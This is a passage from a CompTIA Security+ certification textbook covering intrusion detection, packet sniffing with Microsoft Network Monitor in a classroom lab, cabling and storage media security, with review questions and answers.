Network-based IDS monitor activity on a specific network segment. Unlike host-based agents, network-based systems are usually dedicated platforms with two components: a sensor, which passively analyzes network traffic, and a management system, which allows security personnel to configure the sensors and provides alarms or feedback to the administrator. Implementations vary with some vendors selling separate sensor and management platforms and others selling self-contained sensor/management systems. An example of a Cisco IDS can be seen in Exhibit 9-8. The sensors in a network-based IDS capture network traffic in the monitored segment and perform rule-based or expert system analysis of the traffic using configured parameters. The sensors analyze packet headers to determine source and destination addresses in the same manner as a router. In addition, the sensors examine the type of data being transmitted and analyze the content of the packets flowing through them to determine if the packet is legitimate.
Network devices
927
If the sensor detects a packet that should not be in the system, it can perform a variety of tasks including sending an alarm to the management software or communicating with a router to have the router block all further packets from a particular address.
Exhibit 9-8: A Cisco network based IDS
Anomaly-based detection
Anomaly-based detection involves building statistical profiles of user activity and then reacting to any activity that falls outside these profiles. A users profile can contain attributes such as time spent logged on to the network, location of network access, files and servers accessed, and so forth. One problem with anomaly-based detection is that users do not access their computers or the network in static, predictable ways; employees are transferred to other departments, or they go on the road or work from home, changing their point of entry into the network. Anomaly-based intrusion detection often leads to a large number of false positives.
Discuss how anomaly detection systems are much like some of todays terrorist investigators who have been monitoring a group or an area for quite some time and are looking for any changes in standard activity or behavior, which might indicate that something is amiss
Signature-based detection
Signature-based detection is very similar to an antivirus program in its method of detecting potential attacks. Its currently the more popular method of detection. Vendors produce a list of signatures that the IDS use to compare against activity on the network or host. When a match is found, the IDS take some action, such as logging the event or sending an alarm to a management console. Although many vendors allow users to configure existing signatures and create new ones, for the most part, customers depend on vendors to provide the latest signatures to keep the IDS up to date with the latest attacks. Signature-based detection can also produce false positives, as certain normal network activity can be construed as malicious. For example, some network applications or operating systems might send out numerous ICMP messages, which a signature-based detection system might interpret as an attempt by an attacker to map out a network segment.
928
Do it!
F-1:
Discussing IDS

1 IDS offer the ability to analyze data in real time to detect, log, and stop misuse or attacks as they occur. True or false?
True
2 Compare the effectiveness of anomaly-based intrusion detection versus signaturebased detection.

Anomaly-based detection builds statistical profiles of user activities as a baseline for abuse. Users do not access their computers or network in static, predictable ways. The resources required for such a sensor is very large and costly, also, this method leads to a large number of false positives. Signature-based detection relies on a vendor-produced list of signatures to compare against activity on the network or host. This method can also produce a large number of false positives.
Network devices
929
Topic G: Network monitoring

# 2.5 Objective Recognize and understand the administration of the following file transfer protocols and concepts Vulnerabilities Packet Sniffing 3.1 Understand security concerns and concepts of the following types of devices Network Monitoring / Diagnostics
Network monitoring and diagnostics

Explanation Network monitoring and diagnostics are essential steps in ensuring the safety and health of a network. Network monitoring is exactly what it sounds like, monitoring your network to ensure its reliability. Network monitoring and diagnostic tools can be either stand-alone or part of a network-monitoring platform such as HPs OpenView, IBMs Netview/AIX, Fidelias NetVigil, or Aprismas Spectrum. Microsoft Network Monitor Network Monitor is provided with Windows Server 2003 and offers basic network sniffing features, such as data collection, logging, fault analysis, and performance analysis. Its a good learning tool, but its limited to sniffing packets from the local NIC. Microsoft also offers an enhanced version of Network Monitor that can operate in promiscuous mode and sniff packets from any computer on the network. This product should be used on a production network and is packaged along with Microsoft Systems Management Server. Network monitor captures and displays a packet's source and destination address, the protocol used and data sent. If sent data is encrypted, its not readable in Network Monitor, that is, it's not displayed in plain text. All data sent to a monitored NIC is captured by Network Monitor by default. If you want to reduce the scope of what data is collected, you can apply a filter. Included with the full version of Network Monitor is the ability to identify Network Monitor users.
930
Do it!
G-1:
Installing Microsoft Network Monitor Heres why
Heres how
Students should have a Windows Server 2003 installation CD-ROM available for this activity.
1 Boot to Server-X 2 Log on as Administrator 3 Click Start Choose Control Panel, Add
or Remove Programs To install Network Monitor.
4 Click Add/Remove
Windows Components
Make sure students don't check the check box.
5 Select Management and

Monitoring Tools
Click Details 6 Check the Network Monitor Tools box Click OK 7 Click Next Insert the Windows Server 2003, Standard Edition CD Click OK 8 Click Finish 9 Close the Add or Remove Programs window 10 Open a Command window Type ipconfig/all Press e 11 Write down the MAC address of the network card that is connected to the classroom network
At the command prompt. (If prompted.) To configure Network Monitor to operate on the appropriate NIC.
To continue the installation. To complete the installation.
Network devices 12 Click Start Choose Administrative Tools, Network Monitor

Youll receive a message as shown below.
931
13 Click OK 14 Expand Local Computer Select the appropriate NIC (the MAC address you wrote in Step 9)
The screen will resemble the one shown below.
15 Click OK Close all windows
932
Using Microsoft Network monitor to sniff an FTP session

Explanation While Network Monitor is a very useful networking utility; it can also be used maliciously. As discussed previously, FTP and Telnet send-usernames and passwords in clear text. Other protocols that send passwords and data in clear text include HTTP, NNTP, IMAP, POP and SNMP. For FTP, Network Monitor can capture the entire FTP session and present the username and password to the potential hacker. One way to prevent this is to use only anonymous access for FTP sites. This does not enable you to lock down access to the server. You could also configure the FTP server to only allow certain IP addresses or use a VPN connection to limit the access to the appropriate users. A sniffer can be also be dangerous because it is very difficult to detect and can be attached to almost any part of a network.
Exhibit 9-9: Network Monitor capture of an FTP session
Network devices Do it!
933
G-2: Using Network Monitor to sniff an FTP session Heres how Heres why
Pair up with a partner for this activity. Each of your servers should have FTP services and Network Monitor installed.
Students should run this activity with a partner. Both servers should have the FTP server service and Network Monitor installed.
1 Access Computer Management
2 Expand Services and

Applications
3 Expand Internet
Information Services
4 Expand FTP Sites 5 Ensure that the Default FTP Site is started 6 Click Start Choose Administrative Tools, Network Monitor 7 On the menu bar, choose Capture, Start 8 Open a Command window 9 Type ftp <your partners IP
address> You might also use the IP address of your own server. Start the Default FTP Site if it's stopped.
10 Enter Administrator for the user Enter password for the password 11 Once you are logged on, enter
quit
12 Switch back to the Network Monitor Choose Capture, Stop Click View
Information displayed will be similar to that shown in Exhibit 9-9.
13 Close all windows
Do not save the capture.
934
Do it!
G-3:
Reviewing Network Monitor

1 Network Monitor captures and displays which of the following? (Choose all that apply.) A B C D
E
Source address Destination address Protocol Data All of the above
2 Which of the following security features is available for the full version of Network Monitor?
A
Identify Network Monitor Users Intrusion detection system add-on Packet modification tools Password Sniffing tools
B C D
3 Network Monitor will allow you to view encrypted data in plain text. True or false?
False: Encrypted data is unreadable.
4 Which of the following protocols sends passwords and data in clear text? (Choose all that apply.) A B C D E F G
H
Telnet FTP HTTP NNTP IMAP POP SNMP All of the above
5 Network Monitor will capture all data sent to your NIC by default. What can be used to narrow the scope of the data collected? A B
C
A NIC in promiscuous mode A screen A filter A strainer
Network devices 6 Network Monitor is considered a sniffer. Which of the following is a characteristic of a sniffer? A B C
D
935
Logging Fault analysis Performance analysis All of the above
7 A sniffer can be dangerous because it is very difficult to detect and can be attached to almost any part of a network. True or false?
True
936
Unit summary: Network devices

Topic A In this topic, you learned that a firewall creates a virtual barrier between an internal and external network. It accomplishes this through network address translation, packet filtering, stateful packet inspection, application gateways, and access control lists. You also learned that the steps involved in drafting a security policy include determining what devices require protection, identifying the potential threats, disabling non-essential services, and identifying who requires access to the network and who will administer it. In this topic, you learned how routers and gateways are used within the networking environment and how to safeguard their security. You learned about the various servers found in the demilitarized zone, including bastion hosts, honey pots, and application gateways. You also examined the Open Systems Interconnection (OSI) stack and how it applies to packet filtering on the router. In this topic, you learned the steps to take to secure a switch. You identified the vulnerabilities intrinsic in switches and how they can be overcome using virtual local area networks (VLANs), Secure Shell (SSH), and installation behind a firewall. In this topic, you learned how to protect Private Branch Exchange (PBX), modems, and wireless devices against intrusion. You learned that these are often overlooked when developing a security policy and require special diligence to overcome their vulnerabilities. In this topic, you learned how to secure remote access connections using Virtual Private Networks (VPNs) and Remote Access Service (RAS) technologies. In this topic, you studied the Intrusion Detection System (IDS). You learned that the IDS offers the ability to analyze data in real time to detect, log, and stop misuse or attacks as they occur. You also learned about the various types of Intrusion Detection Systems. In this topic, you learned about the characteristics of network sniffers and how to use Microsoft Network Monitor to monitor traffic on the network.
Topic B
Topic C
Topic D
Topic E Topic F
Topic G
Review questions
1 What is a firewall?
A hardware or software barrier that isolates one network from another.
2 Answering the following questions provides you with what? What is being protected, from whom is it being protected, what services does the company need to access over the network, who gets access to which resources, and who administers the network.
You can draft a robust security policy, by answering those questions.
3 What do firewalls protect against?

Firewalls effectively protect against malicious packets from the outside and unauthorized Internet access from within the company.
4 List the techniques typically used by firewalls to protect networks.

NAT, packet filtering, SPI, and ACL
Network devices 5 PAT is a subset of NAT. True or False?

True
937
6 What is a router?
A network management device that sits between different network segments and routes traffic from one network to another.
7 A DMZ is used for servers on a battlefield. True or False?

False: DMZ in network terms is the area that a company sets aside for servers that are publicly accessible or have lower security requirements than other internal servers.
8 What is a bastion host?

A computer that resides in a DMZ and hosts Web, mail, DNS, and/or FTP services.
9 What is another name for an application gateway?

Proxy server
10 List the layers of the OSI model.

1 Physical 2 Data Link 3 Network 4 Transport 5 Session 6 Presentation 7 Application
11 Which devices work at layer 1 of the OSI model? A Bridge B Switch

C D
Repeater Hub
12 Which Layer 2 device can limit the functionality of sniffing? A A bridge B A hub
C A switch
D A router 13 Why should you configure a switch using a physical connection to it?
If you use Telnet or HTTP protocols to access the switch remotely, these are both open text protocols that can be intercepted leading to compromising of the security of the switch configuration.
14 What feature is used for cable network security that provides authentication and packet filtering?
DOCSIS
938
CompTIA Security+ Certification 15 What steps can you take to make RAS connections more secure?
Use a bastion host running only RAS and protected by application gateway software or firewall software. To further enhance security, use the encryption and mandatory callback features offered on RAS. In addition, if any unauthorized persons should gain access to the RAS server, they will still have to break through the firewall to get useful information
16 VPN tunnels typically use IPSec encryption. True or False?

True
17 Intrusion detection systems (IDS) offer the ability to analyze data in real time to detect, log, and stop misuse or attacks as they occur. True or False?
True
18 Host-based IDS systems are usually dedicated platforms with two components: a sensor, which passively analyzes network traffic, and a management system, which allows security personnel to configure the sensors and provides alarms or feedback to the administrator. True or False?
False: This is a description of a network-based IDS.
19 How does anomaly-based detection work?

Anomaly-based detection involves building statistical profiles of user activity and then reacting to any activity that falls outside these profiles.

In this exercise, you test your computer for Internet Security. You must have an Internet connection to begin this exercise. 1 At your server, go to the Gibson Research Corporation Web site:
http://grc.com/default.htm.
2 Click on the ShieldsUp! link. You might have to scroll down to see the link. 3 On the resulting Shields Up! page, scroll down midway and click on the Proceed button. Click Yes. 4 Click on the File Sharing button. 5 Your computer system will be tested for file system security. If you have a printer available, print the results of the test noting any system vulnerabilities. 6 Scroll down the page and click on the Common Ports button. 7 Your computer system will be tested for security related to ports that are commonly used. If you have a printer available, print the results of the test noting any system vulnerabilities. 8 Repeat the process of checking your computer by clicking on the All Service Ports, Messenger Spam and Browser Headers buttons respectively after each previous test has completed. 9 When you've completed all tests, return to the GRC Web site at http://grc.com/default.htm and again click on the ShieldsUp! link. 10 Close all open windows.
101
Unit 10 Transmission and storage media

A Identify the various types of transmission
media and describe how to physically protect the media.

B Identify the various types of storage media
and discuss ways to mitigate the risk of catastrophic data loss.
102
Topic A: Transmission media

# 3.2 Objective Understand the security concerns for the following types of media Coaxial Cable UTP / STP (Unshielded Twisted Pair / Shielded Twisted Pair) Fiber Optic Cable
Types of transmission media

Explanation At the core of internetworking technology is the Open Systems Interconnect (OSI) model. The first layer (Physical layer) of the model deals with the transmission media, which includes: Coaxial cable Twisted pair copper cable (shielded and unshielded twisted pair) Fiber-optic cable Wireless connections
Coaxial cable
Coaxial cable has a single wire conductor surrounded by an insulating material, which in turn is surrounded by a braided metal shield (see Exhibit 10-1). Coaxial cable tends to be more expensive than traditional telephone wiring, but is much less prone to interference. Vulnerabilities include cable breaks and malicious tapping. There are actually three types of coaxial cable used in networking: RG-8 RG-58 RG-59
Exhibit 10-1: Coaxial cable
Transmission and storage media RG-8
103
RG-8, also referred to as 10Base5 or ThickNet, is the oldest form of coaxial cable. It uses baseband (single channel) signaling and 50-Ohm terminators. It is primarily used as a backbone in an Ethernet LAN environment and often connects one wiring closet to another. It can transmit data at speeds up to 10 Mbps, cover distances up to 500 meters, and can accommodate up to 100 nodes per segment. Up to five segments can be daisychained. Due to its rigidity, it is difficult to work with. RG-58 RG-58, also called 10Base2 or Thinnet (thin coaxial cable), uses baseband signaling and 50-Ohm terminators. It is the more popular form of coaxial cabling for Ethernet networks. Thinnet is capable of covering up to 185 meters and is not highly susceptible to noise interference. It transmits at 10 Mbps and can support up to 30 nodes per segment. Up to five segments can be daisy-chained. RG-59 RG-59 is the familiar coax cable used for cable TV and cable modems. It is rated 75 Ohms and offers broadband (multiple channels) transmission. RG-59 is able to transport both analog and high-speed digital signals, allowing for data, voice, and video capabilities. Note: It is important to know that 50-ohm and 75-ohm cabling are not interchangeable.
Twisted pair cable

Twisted pair cable is a popular wiring type for LANs. Individual wires are twisted together to prevent cross talk between pairs and to reduce the effects of electromagnetic interference (EMI) and radio frequency interference (RFI). EMI is interference in signal transmission or reception and is caused by the radiation of electrical or magnetic fields, which are present near power cables, heavy machinery, or fluorescent lighting. Twisting the copper wires together and wrapping them in a plastic outer casing can lessen this type of interference. It is a very inexpensive alternative to coaxial cable, but cannot support the same distances. Twisted pair copper cable has long been used by telephone companies, and most buildings in North America are pre-wired with one version of it, unshielded twisted pair (UTP). An example is shown in Exhibit 10-2.
Exhibit 10-2: Unshielded twisted pair cable
104
CompTIA Security+ Certification The difference between UTP and shielded twisted pair (STP) is an extra foil shield that is wrapped between the copper pairs to provide additional protection from EMI (Exhibit 10-3).
Exhibit 10-3: Shielded twisted pair cable Twisted pair is further classified into different categories based on the data transmission rates it can sustain. The most common types of cables are Category 3 (CAT 3), Category 5 (CAT 5), and most recently Category 6 (CAT 6). CAT 3 is the minimum requirement for 10Mbps Ethernet and voice systems. CAT 5 is required to support Fast Ethernet (100Mbps) and uses an 8-pin configuration that can be modified for use as a crossover cable, a straightthrough cable, or a customized cable. CAT 5E is a higher grade CAT5 cable. CAT 6 is a newer technology that is capable of supporting Gigabit Ethernet (1000 Mbps) and is backwards compatible and also uses an 8-pin configuration. Twisted pair connects to hardware using an RJ-45 connector, which looks very similar to a phone jack, but is a bit larger (Exhibit 10-4).
Exhibit 10-4: RJ-45 connector Note: It is important to know that twisted pair is very easily spliced, which allows unauthorized users access to the network. A discussion of these types of problems follows later in the unit.
105
Fiber-optic cable
Fiber-optic cable is the newest form of cable available. It comprises a glass core that is encased by a plastic outer covering. It is also much smaller, lighter, more fragile, and susceptible to damage than coaxial cable or twisted pair (Exhibit 10-5).
Exhibit 10-5: Fiber-optic cable Instead of an electrical current (like coaxial and twisted pair), fiber-optic cable carries light. It is capable of transmitting more data much further than other wiring types and is immune to the effects of EMI. Perhaps the biggest benefit of using fiber-optic cable is that it is nearly impossible to splice without detection. In order to effectively split a fiber-optic signal, the core must be disrupted, thus allowing for ease of detection by a network administrator. The biggest disadvantages to fiber are its cost and its difficulty to install and manipulate. The table below provides a comparison of the three types of wired transmission media just discussed.
Media Coaxial cable Advantages High bandwidth, long distances, relative EMI immunity Disadvantages Physical dimensions (can be bulky and difficult to work with), easily tapped, single cable break brings the network down Most sensitive to EMI, supports short distances, easily tapped
Twisted pair copper cable
Inexpensive, widely used, easy to add nodes, single cable break wont bring the network down Very high bandwidth, EMI immunity, long distances
Fiber-optic cable
Most expensive, difficult to implement
Wireless
Unguided transmissions of data use various technologies including microwave, radio, and infrared to receive and transmit over airwaves. Wireless was previously discussed at length, yet it is important to realize that it too is a form of transmission media and should be considered when thinking about implementing and securing networks. Much like coaxial cable and twisted pair copper cable, unguided transmission methods are vulnerable to security breaches in which unauthorized users intercept data flows. The most important distinction is that because unguided connections cannot easily be physically contained like the media, it is much more difficult to secure.
106
Do it!
A-1:
Discussing transmission media

1 Thinnet can transmit data at speeds up to __________. A B
C
100 Mbps 50 Mbps 10 Mbps 5 Mbps
2 A(n) __________ is a standardized connector used to connect twisted pair copper cable to a piece of networking equipment. A
B
DL-17 RJ-45 RJ-54 RJ-11 LD-71
C D E
3 Fiber-optic cable is comprised of a __________ core. A B C

D
plastic copper gold glass
4 Fiber-optic cable uses __________ to transmit data. A B

C
EMI electrical current light vibrations
5 __________ is the most secure of the physical transmission media. A B

C
Coaxial cable Twisted pair copper cable Fiber-optic cable
6 __________ is the most inexpensive transmission media. A

B
Coaxial cable Twisted pair copper cable Fiber-optic cable
107
7 Twisted-pair cable is the most widely known by the general public because it is the primary type of cabling used for cable television. True or false?
False. Coaxial cable is used for cable television.
8 CAT 3 is the minimum requirement for 10 Mbps Ethernet and voice systems. True or false?
True
9 CAT 5 is required to support Fast Ethernet (100 Mbps). True or false?

True
108
Securing transmission media

Explanation Many unauthorized users intend to harm an organization by accessing the network infrastructure. To counteract this type of activity, the implementation of an extremely secure infrastructure can be very expensive, yet cutting corners when securing transmission media can make an organization an easy target. A balanced approach must be followed when making security decisions. The most vulnerable aspect of a network is the data flow. Network infrastructures may be very complex and span significant geographic distances. These interdependent pieces of the network can be easily compromised when a wire or cable is tapped or spliced. Common attacks include interception and interruption of traffic: Interception of traffic usually involves the tampering of physical media as it crosses non-secure areas. For example, coaxial cable or twisted pair is sometimes used to connect separate floors in an office building. The space between floors may be unsecured by the company or organization and accessible by potential attackers using a simple splice of the cable. Interruption of traffic is caused by rendering network access devices inoperable. This can happen when a potential attacker has access to a wiring closet or LAN closet. Damage to networking equipment is easy to accomplish once access is gained. Attacks that are more difficult involve unauthorized eavesdropping or sniffing of network traffic because it typically requires physical access. If the network is compromised in such a way that this can occur, most of the work to attack the integrity of a network has already been done. Common scenarios include: Inserting a node that has the ability to intercept network traffic using a sniffer or some other packet analyzer. Modifying switch or router configurations to bypass network security devices such as firewalls. Resetting an interior node so that its data flows are exported to an external path. War driving, a common problem with wireless transmissions. Altering data flows on the network compromises the integrity of the network. Potential damage can include the corruption of data, sabotage of core business plans, and impersonation of corporate nodes to gain even further access. This can be accomplished by cracking passwords obtained using a sniffer. Physical security Network devices are usually easy targets because most organizations do not have a permanent person on duty to protect the equipment in its physical location. A locked door on a wiring closet is not enough if that space is shared with phone companies or other external vendors. If the space is shared, enclosed racks that can be locked should be purchased. Only authorized employees who need access to the network equipment are given a key. Another added layer of security in this instance is to install closed circuit security cameras that are monitored as part of the standard security of the building. In a large Web complex or data center, raised floors are a great place for attackers to hide devices that are tapped into the network. There are floor tiles available that you can fasten to the floor to provide another layer of security. It is also a good idea to monitor the floor area with regular inspections looking for unauthorized equipment.
109
It is extremely difficult to ensure the security of physical cabling. Both coaxial cable and twisted pair are easily spliced. The most vulnerable places for gaining unauthorized access to cabling are between buildings or floors. Sometimes, the distance between the points is large enough to require fiber-optic cable, which gives the added benefit of more security. However, the majority of interfloor connections still use some form of copper wire, which makes the physical security of that connection all the more important. Electromagnetic emissions Despite all of the physical security that can be implemented, it is still possible for attackers to eavesdrop on data flows by listening for electromagnetic emissions from workstations and other nodes. There are several ways to protect against this. If possible, purchase and use equipment that is designed to limit or eliminate the signal leaks. This can be very expensive. Fiber-optic cable is especially good at eliminating this type of risk. Another way to stop eavesdropping through electromagnetic emission is to encrypt the data flows using various different encryption technologies. This way, even if an attacker has access to the flows, the data is useless without a key to decrypt the data. Power interruptions In many situations, LAN and wiring closets tend to share spaces with power sources and other utilities. This exposes the network to a failure risk even without a threat of an attacker. Should there be a fire, the network can be showered with water or other fire retardants. Several dry methods for fire extinguishing can be used and should be investigated when securing a network. Many LANs are also completely reliant on a power supplier for all the power to the network. Deploying an uninterruptible power supply (UPS) can mitigate this risk by providing temporary power during a brief outage. Interruption of services Another way to secure the infrastructure is to implement a redundant network (having multiple devices in the same function). In this instance, if a network device becomes compromised, it does not necessarily mean that the entire network is compromised. A backup device can be available to take over the duties of the disabled piece of equipment. War driving The media has covered many cases of war driving. Literally, war driving is using a laptops wireless network interface card set in promiscuous mode to pick up unsecured wireless signals. Today, hackers are war driving, or LAN-jacking, wireless networks for anonymous and free high-speed Internet access or purely for access to a network. War driving requires no elaborate software or hardware. An ordinary wireless NIC set in promiscuous mode easily latches on to open wireless network beacons. Using a global positioning satellite (GPS) receiver in conjunction with wireless network interface cards, hackers are mapping major metropolitan areas and compiling a list of wireless networks, both secured and unsecured. One of the best ways to defend against such attacks is to use a VPN or other encryption technology when using wireless LANs.
1010 CompTIA Security+ Certification

Thorough attention to the security of the infrastructure is one of the least expensive means of preventing successful compromises of the system. While stronger security appliances and extensive infrastructure choices help make more secure networks, careful design and implementation is necessary. Mapping out cabling and deploying fiber optics in unsecured areas can help mitigate the risk of eavesdropping. Do it!
A-2:
Securing transmission media

1 A(n) __________ can mitigate the risk of power outages and network downtime. A
B
surge protector UPS EMI ACL
C D
2 What is the most likely area for an intruder to try to gain access to physical network media?
A non-secure area, such as the space between floors where coaxial or twisted pair media may be connecting separate floors in an office building.
3 What are some of the ways you can minimize eavesdropping of electromagnetic emissions?
Use fiber optic cable and/or encrypt data.
4 What is another term for war driving?

LAN-jacking
1011
Topic B: Storage media

# 3.2 Objective Understand the security concerns for the following types of media Removable media Tape CD-R (Recordable Compact Disks) Hard Drives Diskettes Flashcards Smartcards
Fixed and removable storage media

Explanation Computer users are constantly creating and transporting files that need to be stored and used later. Storage media provides a way to hold data at rest. Perhaps the most common type of storage media is a hard disk drive. Every computer has a permanent hard drive as part of its hardware configuration. The hard drive can store a multitude of information, from operating systems to software to personal files. Hard disk drives were developed by IBM in the 1970s and are ubiquitous today. Removable storage media has been around nearly as long as the computer itself and goes back to the times of the punch card. Advancements in computer technology brought about magnetic storage devices that are much more efficient and can store much larger amounts of data. Today there are three major types of storage media: magnetic, optical, and solid-state.
1012 CompTIA Security+ Certification Magnetic storage media

Magnetic storage media is coated with some form of iron oxide. When data is recorded to the media, an electromagnet inside the disk drive rearranges the iron oxide particles into a series of patterns that represent 0s and 1s. These patterns can be readily identified later. When the data is retrieved, the reading disk drive uses a magnetic field to read what the pattern is. This pattern is then translated into data that is sent to the computer in binary form. The most prominent forms of magnetic storage media in use today are shown in Exhibit 10-6.
Exhibit 10-6: Various storage media Floppy disks The first floppy disks were not rigid or encased in hard plastic as they are today. The size of the floppy has changed several timesthe original floppy disk measured 8 inches across. A 5.25-inch disk was then developed, and finally the 3.5-inch disk that is now commonly used. Other types of floppy disks also exist, but the most common is the 3.5-inch, high density, which holds about 1.44 MB of data. The 3.5-inch floppy disk has a circular magnetic piece of plastic, which is placed inside a rigid plastic case for protection. To help avoid data loss, carrying disks in a waterproof case helps prevent water or dust from damaging the disk. Keep floppy disks away from anything that might hold a magnetic or electrical field, such as a mobile phone, radio, metal tools or paper clips that have been stored in a magnetic paper clip holder. Because floppy disks are made of magnetic material, any other magnetic material can erase or damage data on the floppy disk. Store floppy disks in an area with a temperature between 32 and 140 F. Although the floppy disk was once the primary type of magnetic removable media, it is quickly being replaced by larger-capacity magnetic disks. Cartridge disks Cartridge drives were popular in the 1990s. They gave users more capacity than the 1.44 MB floppy disks had. Users were comfortable with removable disk storagethey had been using the floppy disks. Removable disk storage has changed a lot over the years from the basic floppy disk to the Bernoulli box to the REV drive. Popularity of cartridge drives has declined with the rise in availability of CD and DVD recordable media and drives.
1013
The Iomega Company has created many of the cartridge drives and related media. The first of these was the Bernoulli Box. It was originally offered with 5, 10, and 20 MB disk choices. Over the years they increased the disk capacity up to 230 MB. The disks were Mylar disks (like in a floppy disk), in approximately 5.25 inch sturdy cartridge cases. Zip drives Another popular solution was the Iomega Zip drive. This was slightly larger than a 3.5 floppy disk. The original capacity was 100 MB. Later versions were 250 and 750 MB. The 750 MB drive could read 100 MB cartridges, but not write to them. The 250 MB drive could read and write to 100 MB cartridges, but at a slower speed than to 250 MB cartridges. It was available with parallel, SCSI, and USB interface options. Zip disks are prone to getting dirty and the drives were prone to heads becoming misaligned. This caused problems reading the disks. The head arm would be rapidly snapped into the drive and out again, creating a click. This became known as the click of death. It often tore the edge of the disk and sometimes damaged the head as well. Damaged disks could also damage other drives if the disk was tried in another drive.
Exhibit 10-7: Zip drive and cartridge Jaz drives Another storage solution Iomega introduced was the Jaz drive. It had 1 GB and 2 GB cartridges that used Winchester hard drive technology. They were available in SCSI and USB interface models. REV drives The current Iomega offering is the 35 GB REV drive. The read/write heads and controller are contained in the drive. They can be connected via USB, SCSI, FireWire, and ATAPI interfaces.

Imation drives The other major player in the removable cartridge storage solution was Imation, a 3M company. Their product was the SuperDisk. The LS-120 and LS-240 models had 120 MB and 240 MB capacity respectively. These drives can also read standard 1.44 MB floppy disks. The drives were not common. They came out after Iomega Zip drives had already been out for several years. They were slow and prone to reliability problems. People liked them because they could read standard floppy disks. Tape drives There are also numerous magnetic storage technologies such as quarter inch cartridge, digital audio tape (DAT), and digital linear tape (DLT) that are variations on tape drives and can store up to 13 GB of information. These types of media are primarily used to backup large amounts of data.
Optical storage media

Optical storage media uses light and reflection to transmit data. There are different types of optical storage, the most common being the compact disc (CD) as shown in Exhibit 10-8.
Exhibit 10-8: Compact disc A CD is a plastic disc covered by a layer of aluminum and a layer of acrylic. Data is recorded onto a CD by creating very small bumps in the aluminum layer on long tiny tracks. The data is then read by a laser beam. As the laser hits the bumps in the tracks, an optical reader called an optoelectronic sensor detects the changing pattern of reflected light from the bumps in the aluminum coating. This pattern is then translated into bits and sent to the computer. Although many CDs are produced professionally, it is now possible to make a CD with a personal computer. CD writers, or burners, record the data onto the aluminum coating, creating the bumps that are read by the CD drive. A typical CD can store 700 MB of data, which is approximately the same as 486 standard floppy disks. This means a CD can store over three million pages of text or 20,000 graphic images. CDs are commonly used to store multimedia, such as music or video, which need large amounts of storage space. The most common forms of CDs are those that hold recorded music.
Transmission and storage media CD-ROMs
1015
The most common type of CD used with computers is the CD-ROM. Material can be written or recorded to the disc only once, usually by a professional CD-ROM producing company. CD-ROMs hold prerecorded materials to be used on a computer, such as software, graphic images, short video clips, or audio. When you purchase a new piece of software, it normally comes on a CD-ROM and is installed using the CD-ROM drive. CD-Rs Compact disc-recordable (CD-R) is another type of CD. It is similar to audio CDs and CD-ROMs. However, unlike a CD or a CD-ROM, which is purchased prerecorded, a CD-R is a blank CD. Data is recorded onto the CD-R by using a CD-R drive. CD-Rs are perfect for storing large amounts of data. Like other types of CDs, CD-Rs hold about 700 megabytes of data. They can be used to store older documents or files that you want to save but do not need to access daily. Many people use CD-Rs to distribute files to others and to backup files. Although CD-R discs appear to be identical to other types of CDs, instead of having an aluminum layer on which the data has been prerecorded using bumps, a CD-R has a layer of light-sensitive dye on top of a layer of reflective gold. Using the CD-R drive, the data is burned or recorded on the disc with a high-powered laser beam. Instead of creating bumps in the aluminum layer like a prerecorded CD, the laser changes the color of the light-sensitive dye by pulsing in patterns. CD-Rs can have data recorded onto it only one time. Hence, it is called a write once, read many (WORM) type of media. The next step in CD technology is the compact disc-rewriteable (CD-RW). A CD-RW disk is very similar to a CD-R disk, except that it can be recorded onto more than once. The layer of dye is different and can be rewritten multiple times, so you can write, delete, and rewrite to the same CD. The CD-RW drive is similar to the CD-R drives, with the additional abilities to record or write over data on the same disc. Both the CD-RW discs and CD-RW drives are more expensive to purchase than CD-R discs and drives. DVDs The DVD is becoming a popular type of permanent optical storage. Primarily used to store full-length feature films, the DVD is similar to a CD, but with a much larger data capacity. A DVD holds about seven times as much data as a regular CD. Like CDs, DVDs are also made out of plastic with a layer of gold, covered by a thin layer of clear polymer. The difference is that the tracks on a DVD are much thinner and placed closer to each other, so many more tracks fit on a disc, allowing more space for recorded data. In addition, DVDs can be recorded on both sides, doubling the amount of storage space available.
Solid-state storage media

Solid-state is a newer type of removable storage media. This technology usually consists of a microchip and has no moving parts, which is why it is called solid-state. Data is recorded directly into the microchip in digital form.

There are several popular types of solid-state media currently being used, as shown in Exhibit 10-9. Called flash memory, these media are used primarily in digital cameras, digital video cameras, digital audio recorders, PDAs, and camera cell phones. Solidstate media is physically very small, yet can contain up to at least 2 GB of memory.
Exhibit 10-9: Solid-state storage media External flash memory readers can access a flash memory card just as if it were an additional hard drive on a computer. Because the computer considers the files on the memory card already on the computer, using these files is just like using any other file on the computer. Removable solid-state storage media can be used with devices, or drives, that are either internal or external. These devices communicate with the computer through interfaces in the form of cables and connectors that connect the device to the CPU or the motherboard. Because there are no moving parts to break, solid-state media is more reliable and durable than conventional hard disk drives. It requires no battery to retain its data. Many other devices such as wireless phones and personal digital assistants (PDAs) also use solid-state media for storage. There currently are several popular types of solid-state media, including CompactFlash, SmartMedia, memory sticks, and secure digital/multimedia cards. CompactFlash The CompactFlash card is a very small type of storage, measuring only 1.7 inches by 1.4 inches, and less than a 1/4 of an inch thick. It weighs a mere half-ounce. Even with this small size, a CompactFlash card currently can store up to 4 GB of data. Many digital devices cannot handle this large storage size, so a more common storage capacity is between 8 and 128 MB. SmartMedia The SmartMedia card is similar to the CompactFlash, but is even thinner and lighter. Many devices use SmartMedia cards, including digital still cameras, MP3 recorders, and newer printing devices. These cards can store only up to 64 MB of data, unlike CompactFlash cards, which can store up to 1 GB. However, SmartMedia cards are less expensive than CompactFlash cards. Like the CompactFlash cards, SmartMedia cards have a high data transfer rate and are resistant to extreme weather conditions.
Transmission and storage media Memory Stick
1017
Another popular type of removable data storage is the Memory Stick. About the size of a stick of chewing gum, the Memory Stick can hold up to 8 GB of data. Memory Sticks are commonly used with digital still cameras, digital music players (MP3), digital voice recorders, and other digital devices. It has some of the same features as the CompactFlash card and the SmartMedia card, including a high data transfer rate, resistance to extreme temperatures, and high storage capacity. Secure digital/multimedia cards Secure digital/multimedia cards are primarily used in MP3 players and digital cameras. These SD/MMC memory cards are about the same size as SmartMedia cards, but thicker and have their own controller like CompactFlash cards. These cards can store up to 8 GB.
Flash memory drives

USB flash memory drives can be plugged into any USB port. Files can then be copied to or from the computer or network. This can lead to unwanted files being introduced to the computer or network. It can also result in theft of files from the computer or network. Some of these devices are also bootable which can lead to additional security problems such as the introduction of viruses. In some school and business settings, the ability to use devices such as removable flash drives is disabled. If one of these drives is detected, the drive does not show up. This is to prevent the introduction of viruses on the network. Also, some companies do not allow their use since these small devices can be easily concealed and used to steal information from the business.
